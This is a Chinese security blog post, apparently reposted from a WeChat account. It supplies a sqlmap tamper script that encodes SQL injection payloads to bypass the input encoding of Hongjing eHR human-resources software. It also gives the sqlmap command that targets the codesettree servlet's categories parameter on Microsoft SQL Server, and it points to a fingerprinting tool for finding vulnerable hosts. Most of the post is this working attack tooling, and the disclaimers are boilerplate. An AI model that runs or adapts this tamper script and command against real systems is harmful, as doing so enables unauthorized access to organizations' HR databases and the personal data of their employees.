声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,鹏组安全及文章作者不为此承担任何责任。
现在只对常读和星标的公众号才展示大图推送,建议大家能把鹏组安全“设为星标”,否则可能就看不到了啦!
使用方法
先使用EHole_magic检测目标是否是宏景ehr
地址:
https://github.com/lemonlove7/EHole_magic
![宏景ehr sql注入tamper脚本(sqlmap使用) 宏景ehr sql注入tamper脚本(sqlmap使用)]()
使用tamper进行注入
将该脚本ehr_SafeCodeEncode_tamper.py放在sqlmap/tamper/目录下
ehr_SafeCodeEncode_tamper
宏景ehr sql注入的tamper脚本(sqlmap使用)
https://github.com/lemonlove7/EHole_magic
from
lib.core.enums
import
PRIORITY
__priority__ = PRIORITY.NORMAL
def
dependencies
()
:
pass
def
tamper
(payload, **kwargs)
:
return
encode(payload)
def
encode
(s)
:
if
s
is
None
:
return
""
else
:
s3 =
""
for
i
in
range(len(s)):
s2 =
""
k =
0
c = s[i]
if
ord(c) >
255
:
s2 = hex(ord(c))[
2
:].zfill(
4
)
s3 +=
"^"
+ s2
elif
(str(c) >=
'0'
and
(str(c) <=
'/'
or
str(c) >=
'A'
)
and
(str(c) <=
'Z'
or
str(c) >=
'a'
)
and
str(c) <=
'z'
):
s3 += c
else
:
s2 = hex(ord(c))[
2
:].zfill(
2
)
s3 +=
"~"
+ s2
return
s3
sqlmap
-u
"http://127.0.0.1:8885/servlet/codesettree?categories=1&codesetid=1&flag=c&parentid=-1&status=1"
-p categories --dbms=
"Microsoft SQL Server"
--tamper ehr_SafeCodeEncode_tamper --level
3
原文始发于微信公众号(鹏组安全):宏景ehr sql注入tamper脚本(sqlmap使用)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论